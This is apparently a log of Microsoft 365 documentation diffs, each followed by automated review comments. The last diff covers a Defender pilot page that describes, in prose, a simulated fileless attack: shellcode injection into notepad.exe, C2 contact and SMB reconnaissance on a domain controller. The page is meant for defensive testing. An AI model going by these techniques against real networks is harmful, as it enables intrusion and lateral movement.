-In **Prepare** \> **Process** \> **Results**, the page shows the current status (if Process is currently running) or the last Process status task status as shown in the following example.
-
-![Process module task status](../media/9430f9e7-a4dd-47c7-ac2e-2c6a60fc948b.png)
-
-The displayed tasks may vary depending on the Process options selected.
-
-- **Inventory**: Advanced eDiscovery iterates through all files selected for Process and performs basic data collection.
-
-- **Calculate signatures**: Calculates the MD5 digital signatures.
-
-- **Compounds extraction**: Extracts inner or contained files recursively from compound files (for example, PST, ZIP, MSG). Extracted files are stored in the case folder of the case.
-
-- **Synchronizing database**: Internal database process.
-
-- **File copy**: Copies Process files. This task is always displayed, even when the advanced Copy files option is selected.
-
-- **Text extraction**: When there are native files, Advanced eDiscovery extracts text from these files using DTSearch. The extracted text of these files is stored as text files in the case folder.
-
-- **Updating metadata**: Processes the loaded metadata.
-
-- **Finalizing**: Internal processing that finalizes data of loaded case files (for example, identify error and success files).
-
-Task status: Displayed after task completion. While tasks are running, run duration is displayed.
-
-> [!NOTE]
-> Completed tasks may also include totals for files that completed processing or files with errors.
-
-> [!TIP]
-> "Cancel" provides a rollback option to stop Process execution and then roll back to the previous data population or saved processed data. Rollback clears all processed data. If you do not want the processed data to be lost (for example, you plan to reload these files), select the "Cancel" option in this window to choose not to roll back.
-
-## Process summary
-
-In Prepare \> Process \> Results \> Process summary, a breakdown of loaded file results is displayed according to successful file processing and error results.
-
-The panes present a graphical display of imported file statistics, as follows:
-
-- **Process summary accumulate**d: All files in the case.
-
-- **Process summary last**: Files loaded from the last session or action.
-
-- **Families last**: Family information in the case (if any).
-
-- If **Seed** files were added, the number of seed files is listed per issue that was defined for the files.
-
- If the marking of **Seed** files failed, that is also noted.
-
-- If **Pre-tagged** files were added, the number of pre-tagged files is listed per issue that was defined for the files.
-
- If the marking of **Pre-tagged** files failed, that is also noted.
-
-![Process module summary](../media/2086a691-9e3d-4117-beb2-a5c3a9a4cc94.png)
-
-## Process summary accumulated and last charts
-
-The left bar includes Source + extracted files: which is all files found.
-
-The right bar, Processed, includes:
-
-- Files with load errors
-
-- Successfully loaded files, which may include:
-
- - **Existing**: Files that were loaded before and are now loaded again (including duplicates).
-
- - **Text**: Unique files with text.
-
- - **Non-text**: Empty text files, empty native text files, native non-text files.
-
- - **Duplicate**s: Duplicate files with text.
-
-## Last process errors
-
-In Prepare \> Process \> Results \> Last process errors, details of the errors in the last session or action performed are displayed.
-
-![Process module errors](../media/4771d0f4-4217-445a-9ba4-8b6541c5ad09.png)
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Running the Process module and loading data](run-the-process-module-and-load-data-in-advanced-ediscovery.md)
-
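Review bot: the removed lines run through the article's "See also" section, which pointed to office-365-advanced-ediscovery.md and run-the-process-module-and-load-data-in-advanced-ediscovery.md, and nothing visible here says where readers of the "Process task status" and "Process summary" sections should go instead. If the article is being retired, add a redirect for it and check that those two sibling articles do not still link back to this file.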
contentunderstanding https://docs.microsoft.com/en-us/microsoft-365/contentunderstanding/adoption-getstarted https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/contentunderstanding/adoption-getstarted.md
@@ -26,28 +26,30 @@ With new AI services and capabilities, you can build content understanding and c
|Manual entry| Form processing | Document understanding | |:-------|:--------|:--------|
-| Data entry and labor-intensive on any content | Process digital content - photos, scans, receipts, business cards, videos with OCR & text | Capture content types and metadata from contracts, resumes, and other structured documents |
-| Interactive | Pre-built, automated | Custom, assisted |
-| People doing the work | Taught by your subject matter experts (SMEs). Capture content types and metadata from contracts, resumes, other structured documents. | SMEs are less involved. from purchase orders, applications, other semi structured and structured documents |
+| Data entry and labor-intensive on any content. | Identify files and extract data from structured or semi-structured documents, such as forms or invoices. | Identify and extract data from unstructured documents, such as letters or contracts, where the text entities you want to extract reside in sentences or specific regions of the document. |
+| Interactive. | Custom, assisted. | Pre-built, automated. |
+| People doing the work. | Taught by your subject matter experts (SMEs). | SMEs are less involved. |
-The following table explains what you get when you use SharePoint Syntex:
+The following table explains availability and licensing for SharePoint Syntex:
| Form processing | Document understanding | |:-------|:-------|
-| Available in APAC, Australia, Canada, EU, JP, LATAM, UK, US | Available in all regions |
-| Uses AI Builder credits - 1M credits = 2000 pages; Consumption is about 2000 invoices=2 units. Power Automate is required - if you need more you can add it. 1M credits allocated for 300+ licenses purchased. You can also purchase credits separately. | Models work on all latin alphabet languages. In addition to English: German, Swedish, French, Spanish, Italian, and Portuguese. |
-| Provisioned against the default common data service environment| Does not have capacity restrictions. |
+| Form processing relies on Power Platform. <br>For information about global availability for Power Platform and AI Builder, see [Power Platform availability](https://dynamics.microsoft.com/geographic-availability/). | Available in all regions. |
+| Uses AI Builder credits.<br>Credits can be purchased in batches of 1M.<br>1M credits are included when 300+ SharePoint Syntex licenses are purchased.<br>1M credits will allow processing of 2000 file pages. | Models work on all latin alphabet languages. In addition to English: German, Swedish, French, Spanish, Italian, and Portuguese. |
+| Provisioned against the default common data service environment. | Does not have capacity restrictions. |
+
+For more information about AI Builder credits and units, see [AI Builder licensing](https://docs.microsoft.com/ai-builder/administer-licensing).
There are two different ways of understanding your content. The model type you use is based on file format and use case: | Form processing | Document understanding | |:-------|:-------|
-| Created from document library | Created in the content center, part of SharePoint Syntex |
-| Model created in AI builder | Model created in native interface |
-| Used for semi-structured file formats | Used for unstructured file formats |
-| Settable classifier | Trainable classifier with optional extractors |
-| Restricted to a single library | Can be applied to multiple libraries |
-| Train on PDF, JPG, PNG format, total 50 MB/500 pp | Train on 5-10 PDF, Office, or email files, including negative examples |
+| Created from document library. | Created in the content center, part of SharePoint Syntex. |
+| Model created in AI builder. | Model created in native interface. |
+| Used for semi-structured file formats. | Used for unstructured file formats. |
+| Settable classifier. | Trainable classifier with optional extractors. |
+| Restricted to a single library. | Can be applied to multiple libraries. |
+| Train on PDF, JPG, PNG format, total 50 MB/500 pp. | Train on 5-10 PDF, Office, or email files, including negative examples. |
SharePoint Syntex integrates with Microsoft 365 compliance features like:
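Review bot: in the first table, the second row now gives form processing as "Custom, assisted." and document understanding as "Pre-built, automated.", the reverse of the removed row, and that sits oddly with the last table, which still describes document understanding as a "Trainable classifier with optional extractors" trained on 5-10 sample files. Please confirm the swap is intended. The licensing row also drops the earlier statement that Power Automate is required; if that still holds, keep it. Minor: "latin alphabet languages" should be "Latin alphabet languages".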
enterprise https://docs.microsoft.com/en-us/microsoft-365/enterprise/ms-cloud-germany-transition-phases https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/ms-cloud-germany-transition-phases.md
@@ -73,6 +73,10 @@ Additional considerations:
- Upon completion of the OneDrive migration to the German region, data indexes are rebuilt. Features that depend on search indexes may be affected while reindexing is in progress.
+- Microsoft Cloud Deutschland customers whose SharePoint Online instance is not yet migrated need to stay on SharePoint Online PowerShell module/Microsoft.SharePointOnline.CSOM version 16.0.20616.12000 or below. Otherwise, connections to SharePoint Online via PowerShell or the client-side object model will fail.
+
+- Microsoft Cloud Deutschland customers whose SharePoint Online instance is migrated must update SharePoint Online PowerShell module/Microsoft.SharePointOnline.CSOM to version 16.0.20717.12000 or above. Otherwise, connections to SharePoint Online via PowerShell or the client-side object model will fail.
+ ## Skype for Business Online
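Review bot: the two added bullets leave SharePoint Online PowerShell module/CSOM versions between 16.0.20616.12000 and 16.0.20717.12000 unaddressed: tenants not yet migrated are told to stay at 16.0.20616.12000 or below, and migrated tenants to move to 16.0.20717.12000 or above. Say whether the builds in between work for either group, and add how an admin can tell which state their SharePoint Online instance is in, since following the wrong bullet means connections fail.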
managed-desktop https://docs.microsoft.com/en-us/microsoft-365/managed-desktop/get-ready/readiness-assessment-fix https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/get-ready/readiness-assessment-fix.md
@@ -23,6 +23,9 @@ For each check, the tool will report one of four possible results:
|Not ready | *Enrollment will fail if you don't fix these issues.* Follow the steps in the tool or this article to resolve them. | |Error | The Azure Active Director (AD) role you're using doesn't have sufficient permission to run this check. |
+> [!NOTE]
+> The results reported by this tool reflect the status of your settings only at the specific point in time that you ran it. If you later make any changes to policies in Microsoft Intune, Azure Active Directory, or Microsoft 365, items that were "Ready" can become "Not ready." To avoid problems with Microsoft Managed Desktop operations, check the specific settings described in this article before you change any policies.
+ ## Microsoft Intune settings You can access Intune settings at the Microsoft Endpoint Manager [admin center](https://endpoint.microsoft.com).
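Review bot: the added note warns that items that were "Ready" can become "Not ready" after a policy change, but it never tells the reader to run the assessment again; suggest closing it with a sentence such as "Rerun the tool after any policy change." The unchanged Error row just above the note reads "Azure Active Director (AD)"; fix it to "Azure Active Directory" in the same pass.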
managed-desktop https://docs.microsoft.com/en-us/microsoft-365/managed-desktop/get-started/conditional-access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/get-started/conditional-access.md
@@ -15,6 +15,10 @@ ms.topic: article
After you've completed enrollment in Microsoft Managed Desktop, you need to adjust certain Microsoft Intune and Azure Active Directory (Azure AD) settings to allow for management and maintain security. Set the following settings to exclude the Azure AD groups that contain Microsoft Managed Desktop devices and users. For steps to exclude groups, see [Conditional Access: Users and groups](https://docs.microsoft.com/azure/active-directory/conditional-access/concept-conditional-access-users-groups#exclude-users).
+> [!NOTE]
+> If you make any changes after enrollment to policies in Microsoft Intune, Azure Active Directory, or Microsoft 365, it's possible that Microsoft Managed Desktop could stop operating properly. To avoid problems with Microsoft Managed Desktop operations, check the specific settings described in [Fix issues found by the readiness assessment tool](../get-ready/readiness-assessment-fix.md) before you change any policies.
++ ## Microsoft Intune settings - Autopilot deployment profile: exclude the **Modern Workplace Devices -All** Azure AD group. For steps, see [Enroll Windows devices in Intune by using Windows Autopilot](https://docs.microsoft.com/mem/autopilot/enrollment-autopilot).
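Review bot: the added note tells readers to check settings "before you change any policies", yet the paragraph directly above it says that after enrollment "you need to adjust certain Microsoft Intune and Azure Active Directory (Azure AD) settings". State in the note that the group exclusions listed in this article are the expected changes and that the warning concerns other policy edits. The hunk header counts four added lines for a two-line note, so two blank lines appear to precede "## Microsoft Intune settings"; one is enough.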
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/mtp-configure-auto-investigation-response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/mtp-configure-auto-investigation-response.md
@@ -1,20 +1,20 @@
--- title: Configure automated investigation and response capabilities in Microsoft 365 Defender description: Configure automated investigation and response with self-healing in Microsoft 365 Defender
-search.appverid: MET150
+search.appverid: MET150
author: denisebmsft ms.author: deniseb
-manager: dansimp
+manager: dansimp
audience: ITPro ms.topic: article ms.prod: microsoft-365-enterprise localization_priority: Normal ms.collection: -- M365-security-compliance -- m365initiative-m365-defender
+- M365-security-compliance
+- m365initiative-m365-defender
ms.custom: autoir ms.reviewer: evaldm, isco
-f1.keywords: CSH
+f1.keywords: CSH
--- # Configure automated investigation and response capabilities in Microsoft 365 Defender
@@ -31,18 +31,17 @@ To configure automated investigation and response capabilities, follow these ste
3. [Review your security and alert policies in Office 365](#review-your-security-and-alert-policies-in-office-365). 4. [Make sure Microsoft 365 Defender is turned on](#make-sure-microsoft-365-defender-is-turned-on).
-Then, after you're all set up, [review pending and completed actions in the Action center](#review-pending-and-completed-actions-in-the-action-center).
-
+Then, after you're all set up, [review pending and completed actions in the Action center](#review-pending-and-completed-actions-in-the-action-center).
## Prerequisites for automated investigation and response in Microsoft 365 Defender |Requirement |Details | |--|--|
-|Subscription requirements |One of the subscriptions: <br/>- Microsoft 365 E5 <br/>- Microsoft 365 A5 <br/>- Microsoft 365 E5 Security<br/>- Microsoft 365 A5 Security<br/>- Office 365 E5 plus Enterprise Mobility + Security E5 plus Windows E5<br/><br/>See [Microsoft 365 Defender licensing requirements](https://docs.microsoft.com/microsoft-365/security/mtp/prerequisites?#licensing-requirements).|
-|Network requirements |- [Microsoft Defender for Identity](https://docs.microsoft.com/azure-advanced-threat-protection/what-is-atp) enabled<br/>- [Microsoft Cloud App Security](https://docs.microsoft.com/cloud-app-security/what-is-cloud-app-security) configured<br/>- [Microsoft Cloud App Security integrated with Microsoft Defender for Identity](https://docs.microsoft.com/cloud-app-security/aatp-integration) |
-|Windows machine requirements |- Windows 10, version 1709 or later installed (See [Windows 10 release information](https://docs.microsoft.com/windows/release-information/)) with the following threat protection services configured:<br/>- [Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints) <br/>- [Microsoft Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features) |
+|Subscription requirements |One of the subscriptions: <ul><li>Microsoft 365 E5</li><li>Microsoft 365 A5</li><li>Microsoft 365 E5 Security</li><li>Microsoft 365 A5 Security</li><li>Office 365 E5 plus Enterprise Mobility + Security E5 plus Windows E5</li></ul><p> See [Microsoft 365 Defender licensing requirements](https://docs.microsoft.com/microsoft-365/security/mtp/prerequisites?#licensing-requirements).|
+|Network requirements |<ul><li>[Microsoft Defender for Identity](https://docs.microsoft.com/azure-advanced-threat-protection/what-is-atp) enabled</li><li>[Microsoft Cloud App Security](https://docs.microsoft.com/cloud-app-security/what-is-cloud-app-security) configured</li><li>[Microsoft Defender for Identity integration](https://docs.microsoft.com/cloud-app-security/mdi-integration)</li></ul>|
+|Windows machine requirements |Windows 10, version 1709 or later installed (See [Windows 10 release information](https://docs.microsoft.com/windows/release-information/)) with the following threat protection services configured:<ul><li>[Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints)</li><li>[Microsoft Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features)</li></ul>|
|Protection for email content and Office files |[Microsoft Defender for Office 365](https://docs.microsoft.com/microsoft-365/security/office-365-security/office-365-atp#configure-atp-policies) configured |
-|Permissions |- To configure automated investigation and response capabilities, you must have the Global Administrator or Security Administrator role assigned in either Azure Active Directory ([https://portal.azure.com](https://portal.azure.com)) or in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)).<br/><br/>- To get the permissions needed to work with automated investigation and response capabilities, such as reviewing, approving, or rejecting pending actions, see [Required permissions for Action center tasks](mtp-action-center.md#required-permissions-for-action-center-tasks). |
+|Permissions |<ul><li>To configure automated investigation and response capabilities, you must have the Global Administrator or Security Administrator role assigned in either Azure Active Directory ([https://portal.azure.com](https://portal.azure.com)) or in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)).</li><p><li>To get the permissions needed to work with automated investigation and response capabilities, such as reviewing, approving, or rejecting pending actions, see [Required permissions for Action center tasks](mtp-action-center.md#required-permissions-for-action-center-tasks).</li></ul>|
## Review or change the automation level for device groups
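Review bot: the new list markup in the Prerequisites table leaves `<p>` tags unclosed: the Subscription requirements cell has "`</ul><p>` See [Microsoft 365 Defender licensing requirements]", and the Permissions cell has "`</li><p><li>`", where a `<p>` sits directly inside the `<ul>` between two items. Close or drop those tags; a `<br/>` inside the preceding item gives the same spacing. Also, the third Network requirements item changed from "Microsoft Cloud App Security integrated with Microsoft Defender for Identity" to "Microsoft Defender for Identity integration", which no longer says what is being integrated; keep Cloud App Security in the link text.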
@@ -50,12 +49,12 @@ Whether automated investigations run, and whether remediation actions are taken
1. Go to the Microsoft Defender Security Center ([https://securitycenter.windows.com](https://securitycenter.windows.com)) and sign in.
-2. Go to **Settings** > **Permissions** > **Device groups**.
+2. Go to **Settings** > **Permissions** > **Device groups**.
3. Review your device group policies. In particular, look at the **Remediation level** column. We recommend using **Full - remediate threats automatically**. You might need to create or edit your device groups to get the level of automation you want. To get help with this task, see the following articles: - [How threats are remediated](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/automated-investigations#how-threats-are-remediated)
- - [Create and manage device groups](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/machine-groups)
+ - [Create and manage device groups](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/machine-groups)
## Review your security and alert policies in Office 365
@@ -73,14 +72,14 @@ Security settings in Office 365 help protect email and content. To view or chang
- [Anti-phishing in Defender for Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-2---anti-phishing-protection) - [Safe Attachments (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#atp-safe-attachments-policies) - [Safe Links (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#atp-safe-links-policies)
- - [Anti-spam (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-3---anti-spam-protection)
+ - [Anti-spam (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-3---anti-spam-protection)
+
+3. Make sure [Microsoft Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-5---turn-on-atp-for-sharepoint-onedrive-and-microsoft-teams-workloads) is turned on.
-4. Make sure [Microsoft Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-5---turn-on-atp-for-sharepoint-onedrive-and-microsoft-teams-workloads) is turned on.
+4. Make sure [zero-hour auto purge for email](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#zero-hour-auto-purge-for-email-in-eop) protection is in effect.
-5. Make sure [zero-hour auto purge for email](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#zero-hour-auto-purge-for-email-in-eop) protection is in effect.
+5. (This is optional.) Review your [Office 365 alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies) in the Microsoft 365 compliance center ([https://compliance.microsoft.com/compliancepolicies](https://compliance.microsoft.com/compliancepolicies)). Several default alert policies are in the Threat management category. Some of these alerts can trigger automated investigation and response. To learn more, see [Default alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies?#default-alert-policies).
-8. (This is optional.) Review your [Office 365 alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies) in the Microsoft 365 compliance center ([https://compliance.microsoft.com/compliancepolicies](https://compliance.microsoft.com/compliancepolicies)). Several default alert policies are in the Threat management category. Some of these alerts can trigger automated investigation and response. To learn more, see [Default alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies?#default-alert-policies).
-
## Make sure Microsoft 365 Defender is turned on 1. Go to the Microsoft 365 security center ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
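Review bot: the unchanged list item "[Anti-phishing in Defender for Office 365)]" at the top of this hunk has a stray closing parenthesis in its link text; fix it in the same pass as the step renumbering. The anchors on the renumbered steps (for example "#part-5---turn-on-atp-for-sharepoint-onedrive-and-microsoft-teams-workloads") still use the older "atp" naming, so verify they still resolve in the target article.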
@@ -93,12 +92,12 @@ Security settings in Office 365 help protect email and content. To view or chang
- If you do *not* see **Incidents**, **Action center**, or **Hunting**, then Microsoft 365 Defender might not be turned on. In this case, proceed to the next step ([Review pending and completed actions](#review-pending-and-completed-actions-in-the-action-center), in this article).
-3. In the navigation pane, choose **Settings** > **Microsoft 365 Defender**. Confirm that Microsoft 365 Defender is turned on.
+3. In the navigation pane, choose **Settings** > **Microsoft 365 Defender**. Confirm that Microsoft 365 Defender is turned on.
Need help? See [Turn on Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable). ## Review pending and completed actions in the Action center
-After you have configured automated investigation and response in Microsoft 365 Defender, your next step is to visit the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)). There, you can review and approve pending actions, and see remediation actions that were taken automatically or manually.
+After you have configured automated investigation and response in Microsoft 365 Defender, your next step is to visit the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)). There, you can review and approve pending actions, and see remediation actions that were taken automatically or manually.
[Visit the Action center](mtp-action-center.md).
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/mtp-enable https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/mtp-enable.md
@@ -14,7 +14,7 @@ author: lomayor
ms.localizationpriority: medium manager: dansimp audience: ITPro
-ms.collection: M365-security-compliance
+ms.collection: M365-security-compliance
ms.topic: conceptual search.appverid: - MOE150
@@ -34,39 +34,46 @@ search.appverid:
Microsoft 365 Defender automatically turns on when eligible customers with the required permissions visit Microsoft 365 security center. Read this article to understand various prerequisites and how Microsoft 365 Defender is provisioned. ## Check license eligibility and required permissions+ A license to a Microsoft 365 security product generally entitles you to use Microsoft 365 Defender in Microsoft 365 security center without additional licensing cost. We do recommend getting a Microsoft 365 E5, E5 Security, A5, or A5 Security license or a valid combination of licenses that provides access to all supported services. For detailed licensing information, [read the licensing requirements](prerequisites.md#licensing-requirements). ### Check your role
-You must be a **global administrator** or a **security administrator** in Azure Active Directory to turn on Microsoft 365 Defender. [View your roles in Azure AD](https://docs.microsoft.com//azure/active-directory/users-groups-roles/directory-manage-roles-portal)
+
+You must be a **global administrator** or a **security administrator** in Azure Active Directory to turn on Microsoft 365 Defender. [View your roles in Azure AD](https://docs.microsoft.com/azure/active-directory/users-groups-roles/directory-manage-roles-portal)
## Supported services+ Microsoft 365 Defender aggregates data from the various supported services that you've already deployed. It will process and store data centrally to identify new insights and make centralized response workflows possible. It does this without affecting existing deployments, settings, or data associated with the integrated services. To get the best protection and optimize Microsoft 365 Defender, we recommend deploying all applicable supported services on your network. For more information, [read about deploying supported services](deploy-supported-services.md). ## Before starting the service+ Before you turn on the service, the Microsoft 365 security center ([security.microsoft.com](https://security.microsoft.com)) shows the Microsoft 365 Defender settings page when you select **Incidents**, **Action center**, or **Hunting** from the navigation pane. These navigation items are not shown if you are not eligible to use Microsoft 365 Defender. ![Image of the Microsoft 365 Defender settings page shown if Microsoft 365 Defender has not been turned on](../../media/mtp-enable/mtp-settings.png) *Microsoft 365 Defender settings in Microsoft 365 security center* ## Starting the service+ To turn on Microsoft 365 Defender, simply select **Turn on Microsoft 365 Defender** and apply the change. You can also access this option by selecting **Settings** ([security.microsoft.com/settings](https://security.microsoft.com/settings)) in the navigation pane and then selecting **Microsoft 365 Defender**.
->[!NOTE]
->If you don't see **Settings** in the navigation pane or couldn't access the page, check your permissions and licenses.
+> [!NOTE]
+> If you don't see **Settings** in the navigation pane or couldn't access the page, check your permissions and licenses.
### Data center location
-Microsoft 365 Defender will store and process data in the [same location used by Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy). If you don't have Microsoft Defender for Endpoint, a new data center location is automatically selected based on the location of active Microsoft 365 security services. The selected data center location is shown in the screen.
-Select **Need help?** in the Microsoft 365 security center to contact Microsoft support about provisioning Microsoft 365 Defender in a different data center location.
+Microsoft 365 Defender will store and process data in the [same location used by Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy). If you don't have Microsoft Defender for Endpoint, a new data center location is automatically selected based on the location of active Microsoft 365 security services. The selected data center location is shown in the screen.
+
+Select **Need help?** in the Microsoft 365 security center to contact Microsoft support about provisioning Microsoft 365 Defender in a different data center location.
->[!NOTE]
->Microsoft Defender for Endpoint automatically provisions in European Union (EU) data centers when turned on through Azure Defender. Microsoft 365 Defender will automatically provision in the same EU data center for customers who have provisioned Defender for Endpoint in this manner.
+> [!NOTE]
+> Microsoft Defender for Endpoint automatically provisions in European Union (EU) data centers when turned on through Azure Defender. Microsoft 365 Defender will automatically provision in the same EU data center for customers who have provisioned Defender for Endpoint in this manner.
### Confirm that the service is on+ Once the service is provisioned, it adds: - [Incidents management](incidents-overview.md)
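Review bot: two of the re-added lines keep wording that is worth fixing while they are being touched: "The selected data center location is shown in the screen" should read "on the screen", and the note "If you don't see **Settings** in the navigation pane or couldn't access the page" mixes tenses; use "can't access the page". The corrected roles link under "Check your role" still ends its sentence without a period.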
@@ -77,8 +84,8 @@ Once the service is provisioned, it adds:
*Microsoft 365 security center with incidents management and other Microsoft 365 Defender capabilities* ### Getting Microsoft Defender for Identity data
-To share Microsoft Defender for Identity data with Microsoft 365 Defender, ensure that Microsoft Cloud App Security and Microsoft Defender for Identity integration is turned on. [Learn more about this integration](https://docs.microsoft.com/cloud-app-security/aatp-integration)
+To share Microsoft Defender for Identity data with Microsoft 365 Defender, ensure that Microsoft Cloud App Security and Microsoft Defender for Identity integration is turned on. [Learn more about this integration](https://docs.microsoft.com/cloud-app-security/mdi-integration).
## Get assistance
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/mtp-pilot-simulate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/mtp-pilot-simulate.md
@@ -1,5 +1,5 @@
---
-title: Run your Microsoft 365 Defender attack simulations
+title: Run your Microsoft 365 Defender attack simulations
description: Run attack simulations for your Microsoft 365 Defender pilot project to see how it unfolds and is quickly remediated. keywords: Microsoft Threat Protection pilot attack simulation, run Microsoft Threat Protection pilot attack simulation, simulate attack in Microsoft Threat Protection, Microsoft Threat Protection pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting search.product: eADQiWindows 10XVcnh
@@ -22,80 +22,78 @@ ms.collection:
ms.topic: conceptual ---
-# Run your Microsoft 365 Defender attack simulations
+# Run your Microsoft 365 Defender attack simulations
[!INCLUDE [Microsoft 365 Defender rebranding](../includes/microsoft-defender.md)]
-|[![Planning](../../media/phase-diagrams/1-planning.png)](mtp-pilot-plan.md)<br/>[Planning](mtp-pilot-plan.md) |[![Prepare](../../media/phase-diagrams/2-prepare.png)](prepare-mtpeval.md)<br/>[Preparation](prepare-mtpeval.md) | ![Simulate attack](../../media/phase-diagrams/3-simluate.png)<br/>Simulate attack| [![Close and summarize](../../media/phase-diagrams/4-summary.png)](mtp-pilot-close.md)<br/>[Close and summarize](mtp-pilot-close.md)|
+|[![Planning](../../media/phase-diagrams/1-planning.png)](mtp-pilot-plan.md)<br/>[Planning](mtp-pilot-plan.md)|[![Prepare](../../media/phase-diagrams/2-prepare.png)](prepare-mtpeval.md)<br/>[Preparation](prepare-mtpeval.md)|![Simulate attack](../../media/phase-diagrams/3-simluate.png)<br/>Simulate attack|[![Close and summarize](../../media/phase-diagrams/4-summary.png)](mtp-pilot-close.md)<br/>[Close and summarize](mtp-pilot-close.md)|
|--|--|--|--|
-|| |*You are here!* | |
+|||*You are here!*||
You're currently in the attack simulation phase.
-After preparing your pilot environment, itΓÇÖs time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of usersΓÇÖ devices. This category of attacks usually doesnΓÇÖt include files dropped on the victimΓÇÖs deviceΓÇöthey occur solely in memory. They ΓÇ£live off the landΓÇ¥ by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.
+After preparing your pilot environment, it's time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's deviceΓÇöthey occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.
In this simulation, our sample scenario starts with a PowerShell script. A user might be tricked into running a script. Or the script might run from a remote connection to another computer from a previously infected deviceΓÇöthe attacker attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities. ![Fileless PowerShell attack with process injection and SMB reconnaisance attack diagram](../../media/mtp/mtpdiydiagram.png)
-During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attackerΓÇÖs command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
-
->[!IMPORTANT]
->For optimum results, follow the attack simulation instructions as closely as possible.
+During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
+> [!IMPORTANT]
+> For optimum results, follow the attack simulation instructions as closely as possible.
## Simulation environment requirements Since you have already configured your pilot environment during the preparation phase, ensure that you have two devices for this scenario: a test device and a domain controller.
-1. Verify your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
+1. Verify your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
-2. Verify your test domain controller configuration:
+2. Verify your test domain controller configuration:
- - Device runs with Windows Server 2008 R2 or a later version.
- - The test domain controller to [Microsoft Defender for Identity](https://docs.microsoft.com/azure/security-center/security-center-wdatp) and enable [remote management](https://docs.microsoft.com/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
- - Verify that [Microsoft Defender for Identity and Microsoft Cloud App Security integration](https://docs.microsoft.com/cloud-app-security/aatp-integration) have been enabled.
- - A test user is created on your domain ΓÇô no admin permissions needed.
+ - Device runs with Windows Server 2008 R2 or a later version.
